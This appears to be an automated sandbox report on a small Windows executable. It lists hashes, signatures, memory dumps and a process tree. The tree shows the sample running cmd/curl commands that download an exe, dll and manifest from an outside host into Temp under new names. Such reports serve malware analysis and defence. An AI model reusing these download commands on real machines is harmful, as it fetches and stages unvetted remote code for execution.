Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
15-01-2022 01:39
Static task
static1
Behavioral task
behavioral1
Sample
ae6cdc2be9207880528e784fc54501ed.exe
Resource
win7-en-20211208
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
ae6cdc2be9207880528e784fc54501ed.exe
Resource
win10v2004-en-20220113
windows10-2004_x64
0 signatures
0 seconds
General
-
Target
ae6cdc2be9207880528e784fc54501ed.exe
-
Size
10KB
-
MD5
ae6cdc2be9207880528e784fc54501ed
-
SHA1
b4aff64bb1f0fee5d5c47c5f1275351c758b423a
-
SHA256
e71a997a58a54db0a879969fa1c3de5193b090bc59f3468f408785dbc0d9c7ac
-
SHA512
d610b732e7cd0442cfac93b83dda3f9f59a627af5e733e5b0ea795b3fdcf6d19c18656f8bdbe78ff1cf87fe2d0c00eb3e2a8cd37bf11954bec4dcd9b7eb00094
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
dw20.exepid process 1080 dw20.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
ae6cdc2be9207880528e784fc54501ed.exedescription pid process target process PID 1584 wrote to memory of 1512 1584 ae6cdc2be9207880528e784fc54501ed.exe cmd.exe PID 1584 wrote to memory of 1512 1584 ae6cdc2be9207880528e784fc54501ed.exe cmd.exe PID 1584 wrote to memory of 1512 1584 ae6cdc2be9207880528e784fc54501ed.exe cmd.exe PID 1584 wrote to memory of 516 1584 ae6cdc2be9207880528e784fc54501ed.exe cmd.exe PID 1584 wrote to memory of 516 1584 ae6cdc2be9207880528e784fc54501ed.exe cmd.exe PID 1584 wrote to memory of 516 1584 ae6cdc2be9207880528e784fc54501ed.exe cmd.exe PID 1584 wrote to memory of 716 1584 ae6cdc2be9207880528e784fc54501ed.exe cmd.exe PID 1584 wrote to memory of 716 1584 ae6cdc2be9207880528e784fc54501ed.exe cmd.exe PID 1584 wrote to memory of 716 1584 ae6cdc2be9207880528e784fc54501ed.exe cmd.exe PID 1584 wrote to memory of 1080 1584 ae6cdc2be9207880528e784fc54501ed.exe dw20.exe PID 1584 wrote to memory of 1080 1584 ae6cdc2be9207880528e784fc54501ed.exe dw20.exe PID 1584 wrote to memory of 1080 1584 ae6cdc2be9207880528e784fc54501ed.exe dw20.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ae6cdc2be9207880528e784fc54501ed.exe"C:\Users\Admin\AppData\Local\Temp\ae6cdc2be9207880528e784fc54501ed.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest -o "C:\Users\Admin\AppData\Local\Temp\flexteam.exe.manifest"2⤵
-
C:\Windows\system32\cmd.exe"cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.dll -o "C:\Users\Admin\AppData\Local\Temp\flexteam.dll"2⤵
-
C:\Windows\system32\cmd.exe"cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe -o "C:\Users\Admin\AppData\Local\Temp\flexteam.exe"2⤵
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 5642⤵
- Suspicious behavior: GetForegroundWindowSpam
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/516-55-0x0000000000000000-mapping.dmp
-
memory/716-57-0x0000000000000000-mapping.dmp
-
memory/1080-59-0x0000000000000000-mapping.dmp
-
memory/1080-61-0x00000000004A0000-0x00000000004A1000-memory.dmpFilesize
4KB
-
memory/1512-54-0x0000000000000000-mapping.dmp
-
memory/1584-56-0x0000000002000000-0x0000000002002000-memory.dmpFilesize
8KB
-
memory/1584-58-0x000007FEFB531000-0x000007FEFB533000-memory.dmpFilesize
8KB